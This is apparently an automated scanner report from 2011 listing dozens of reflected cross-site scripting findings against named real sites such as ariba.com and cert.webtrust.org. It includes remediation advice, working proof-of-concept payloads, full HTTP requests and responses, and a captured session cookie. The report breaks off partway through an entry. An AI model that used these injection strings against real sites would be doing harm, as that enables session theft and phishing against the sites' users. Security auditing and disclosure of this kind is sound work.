Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the Res request parameter is copied into the HTML document as plain text between tags. The payload 408a1<script>alert(1)</script>ae62de57932 was submitted in the Res parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the id request parameter is copied into a JavaScript rest-of-line comment. The payload 153e3%0aalert(1)//9c6d97a8d56 was submitted in the id parameter. This input was echoed as 153e3 alert(1)//9c6d97a8d56 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: public, max-age=31536000 Content-Length: 51603 Content-Type: application/javascript; charset=utf-8 Expires: Wed, 17 Oct 2012 17:27:14 GMT Last-Modified: Tue, 18 Oct 2011 17:27:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Tue, 18 Oct 2011 17:27:14 GMT
function ekFlexMenu_classNames(){}ekFlexMenu_classNames.button="ekflexmenu_button";ekFlexMenu_classNames.buttonHover="ekflexmenu_button_hover";ekFlexMenu_classNames.buttonSelected="ekflexmenu_button_s ...[SNIP]... gWindow.scrollTo(0,10000000)};
//################################################################ //ektron registered javascript: js file does not exist at specified path (404) //id: EktronModalJS153e3 alert(1)//9c6d97a8d56 //path: //################################################################
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 8b293<script>alert(1)</script>6e2d80a3a45 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 868ae<script>alert(1)</script>e099352b230 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 93762<script>alert(1)</script>4d4f59b3a04 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.6. http://cdnt.meteorsolutions.com/api/multi_track [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cdnt.meteorsolutions.com
Path:
/api/multi_track
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c1b0b<script>alert(1)</script>4259a824be9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the query_string_tag_key request parameter is copied into the HTML document as plain text between tags. The payload d05c9<script>alert(1)</script>95ea4625fe1 was submitted in the query_string_tag_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the url_storage_source request parameter is copied into the HTML document as plain text between tags. The payload fec30<script>alert(1)</script>f8aba0eed30 was submitted in the url_storage_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload eea01<script>alert(1)</script>e7a5c7a871a was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the seal request parameter is copied into the HTML document as plain text between tags. The payload 9c065<script>alert(1)</script>396aff9ffe5 was submitted in the seal parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /SealFile?seal=7819c065<script>alert(1)</script>396aff9ffe5&file=logo1 HTTP/1.1 Host: cert.webtrust.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: */* Referer: https://cert.webtrust.org/ViewSeal?id=781 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 500 Internal Server Error Date: Tue, 18 Oct 2011 16:36:05 GMT Content-Type: text/html X-Cache: MISS from cert.webtrust.org Connection: close Content-Length: 3698
<html><head><title>Apache Tomcat/4.0.6 - Error report</title><STYLE><!--H1{font-family : sans-serif,Arial,Tahoma;color : white;background-color : #0086b2;} BODY{font-family : sans-serif,Arial,Tahoma;c ...[SNIP]... <pre>java.lang.NumberFormatException: For input string: "7819c065<script>alert(1)</script>396aff9ffe5" at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48) at java.lang.Integer.parseInt(Integer.java:435) at java.lang.Integer.parseInt(Integer.java:476) at ca.cica.servlet ...[SNIP]...
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 7a702<script>alert(1)</script>32ebbf9783f was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ViewSeal?id=7817a702<script>alert(1)</script>32ebbf9783f HTTP/1.1 Host: cert.webtrust.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://service.ariba.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 18 Oct 2011 16:36:02 GMT Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector) X-Cache: MISS from cert.webtrust.org Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 2976
java.lang.NumberFormatException: For input string: "7817a702<script>alert(1)</script>32ebbf9783f" at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48) at java.lang.Integer.parseInt(Integer.java:435) at java.lang.Integer.parseInt(Integer.java:476) at ca.cica.servlet ...[SNIP]...
1.12. https://connect.ariba.com/AC [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://connect.ariba.com
Path:
/AC
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 441fb--><script>alert(1)</script>b6406cede49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK Connection: close Date: Tue, 18 Oct 2011 18:09:12 GMT Content-type: text/html; charset=iso-8859-1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
The value of the IsErr request parameter is copied into an HTML comment. The payload ba897--><script>alert(1)</script>bd0dd96e3d3 was submitted in the IsErr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK Connection: close Date: Tue, 18 Oct 2011 18:10:32 GMT Content-type: text/html; charset=iso-8859-1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
1.14. https://connect.ariba.com/AC_Login/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://connect.ariba.com
Path:
/AC_Login/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bf284--><script>alert(1)</script>69a1aebb79c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK Connection: close Date: Tue, 18 Oct 2011 18:10:35 GMT Content-type: text/html; charset=iso-8859-1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
The value of the sc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44e69"><script>alert(1)</script>d233b41abc1 was submitted in the sc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Connection: close Date: Tue, 18 Oct 2011 18:10:34 GMT Content-type: text/html; charset=iso-8859-1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
The value of the sc request parameter is copied into an HTML comment. The payload 42531--><script>alert(1)</script>9d122f18f73 was submitted in the sc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK Connection: close Date: Tue, 18 Oct 2011 18:10:35 GMT Content-type: text/html; charset=iso-8859-1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
The value of the u request parameter is copied into an HTML comment. The payload 97e5a--><script>alert(1)</script>5ae655a4126 was submitted in the u parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK Connection: close Date: Tue, 18 Oct 2011 18:10:33 GMT Content-type: text/html; charset=iso-8859-1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
The value of the BaseURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fd54"%3balert(1)//dfb25cd5db685531b was submitted in the BaseURL parameter. This input was echoed as 1fd54";alert(1)//dfb25cd5db685531b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the BaseURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d315b"%3balert(1)//0cdfa14123c was submitted in the BaseURL parameter. This input was echoed as d315b";alert(1)//0cdfa14123c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sc request parameter is copied into the HTML document as plain text between tags. The payload 1086f<script>alert(1)</script>1d31d8de98032848c was submitted in the sc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the sc request parameter is copied into the HTML document as plain text between tags. The payload 943b7<script>alert(1)</script>8ca96b5b20 was submitted in the sc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the sc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 352dc"%3balert(1)//94c491ca4d9 was submitted in the sc parameter. This input was echoed as 352dc";alert(1)//94c491ca4d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8e2c"%3balert(1)//26a07ecc2f93fd1f3 was submitted in the sc parameter. This input was echoed as e8e2c";alert(1)//26a07ecc2f93fd1f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the u request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33e77"%3balert(1)//cbbd67af68b was submitted in the u parameter. This input was echoed as 33e77";alert(1)//cbbd67af68b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the u request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9080"%3balert(1)//fae7de21ea471ed0d was submitted in the u parameter. This input was echoed as b9080";alert(1)//fae7de21ea471ed0d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.26. https://cvmas13.cvmsolutions.com/gd/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://cvmas13.cvmsolutions.com
Path:
/gd/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57765"><script>alert(1)</script>cb3cba300c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gd/?57765"><script>alert(1)</script>cb3cba300c5=1 HTTP/1.1 Host: cvmas13.cvmsolutions.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.google.com/search?gcx=c&sourceid=chrome&ie=UTF-8&q=reuters+supplier#q=supplier+registration&hl=en&tbo=1&prmd=imvns&ei=M6WdTpv5BKjniAK1j5HXCQ&start=10&sa=N&bav=on.2,or.r_gc.r_pw.,cf.osb&fp=67ad93a5206fb0d0&biw=1206&bih=911 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 18 Oct 2011 17:51:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 31771 Content-Type: text/html Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
The value of the catURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf7e3"><script>alert(1)</script>b7fec3d043 was submitted in the catURL parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Tue, 18 Oct 2011 15:29:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 2082
<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>West Research A ...[SNIP]... <input type="hidden" name="catURL" value="cf7e3"><script>alert(1)</script>b7fec3d043"> ...[SNIP]...
The value of the searchby request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd5dd"><script>alert(1)</script>9850b6a53d3 was submitted in the searchby parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Tue, 18 Oct 2011 15:29:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 2083
<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>West Research A ...[SNIP]... <input type="hidden" name="searchby" value="fd5dd"><script>alert(1)</script>9850b6a53d3"> ...[SNIP]...
The value of the searchstring request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d027e"><script>alert(1)</script>802d14f2218 was submitted in the searchstring parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Tue, 18 Oct 2011 15:29:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 2083
<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>West Research A ...[SNIP]... <input type="hidden" name="searchstring" value="d027e"><script>alert(1)</script>802d14f2218"> ...[SNIP]...
The value of the searchtype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1aa7"><script>alert(1)</script>d1bc6a57430 was submitted in the searchtype parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Tue, 18 Oct 2011 15:29:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 2083
<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>West Research A ...[SNIP]... <input type="hidden" name="searchtype" value="e1aa7"><script>alert(1)</script>d1bc6a57430"> ...[SNIP]...
The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e659"><script>alert(1)</script>5f977f7c25f was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Tue, 18 Oct 2011 15:29:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 2083
<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>West Research A ...[SNIP]... <input type="hidden" name="t" value="7e659"><script>alert(1)</script>5f977f7c25f"> ...[SNIP]...
The value of the cpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53c85"><script>alert(1)</script>1f1e0f96fd9 was submitted in the cpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /display/2/loginSecureFrame.aspx?cpid=53c85"><script>alert(1)</script>1f1e0f96fd9&c=&cpc=&cid=&t=&aid=&cat=&catURL=&r=0.585381746292114 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: kbportal.thomson.com Cookie: BIGipServerKB-80=428295335.20480.0000; ASP.NET_SessionId=f3pzgl45ahud4e55fonbxneh; PortalSettings=cpId~24|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/23/styles.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December
Response
HTTP/1.1 200 OK Date: Tue, 18 Oct 2011 15:29:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: IWICategory=IWICategory=; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 842
The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a5d6"><script>alert(1)</script>3b0d47b4214 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /display/2/loginSecureFrame.aspx?cpid=24&c=&cpc=&cid=&t=8a5d6"><script>alert(1)</script>3b0d47b4214&aid=&cat=&catURL=&r=0.585381746292114 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: kbportal.thomson.com Cookie: BIGipServerKB-80=428295335.20480.0000; ASP.NET_SessionId=f3pzgl45ahud4e55fonbxneh; PortalSettings=cpId~24|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/23/styles.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December
Response
HTTP/1.1 200 OK Date: Tue, 18 Oct 2011 15:29:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: IWICategory=IWICategory=; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 762
The value of the ParentAddFuntionName request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 988af%3balert(1)//947510d823b was submitted in the ParentAddFuntionName parameter. This input was echoed as 988af;alert(1)//947510d823b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ParentAddFuntionName request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 83bbe%3balert(1)//256ca66dcfb was submitted in the ParentAddFuntionName parameter. This input was echoed as 83bbe;alert(1)//256ca66dcfb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ParentAddFuntionName request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b0e2d%3balert(1)//679b28d86ad was submitted in the ParentAddFuntionName parameter. This input was echoed as b0e2d;alert(1)//679b28d86ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.37. http://www.ariba.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ariba.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78665"><script>alert(1)</script>41aabb2bdbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.38. http://www.ariba.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ariba.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 786c8--><script>alert(1)</script>623065440be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
1.39. http://www.ariba.com/404.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ariba.com
Path:
/404.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 233dc--><script>alert(1)</script>608e4c4a672 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
1.40. http://www.ariba.com/404.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ariba.com
Path:
/404.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b688f"><script>alert(1)</script>818d4b4e7c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the pageLocation request parameter is copied into an HTML comment. The payload 18239--><script>alert(1)</script>081c7f68b1c was submitted in the pageLocation parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the pageLocation request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e124e"><script>alert(1)</script>354d4e60877 was submitted in the pageLocation parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.43. http://www.ariba.com/contact.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ariba.com
Path:
/contact.cfm
Issue detail
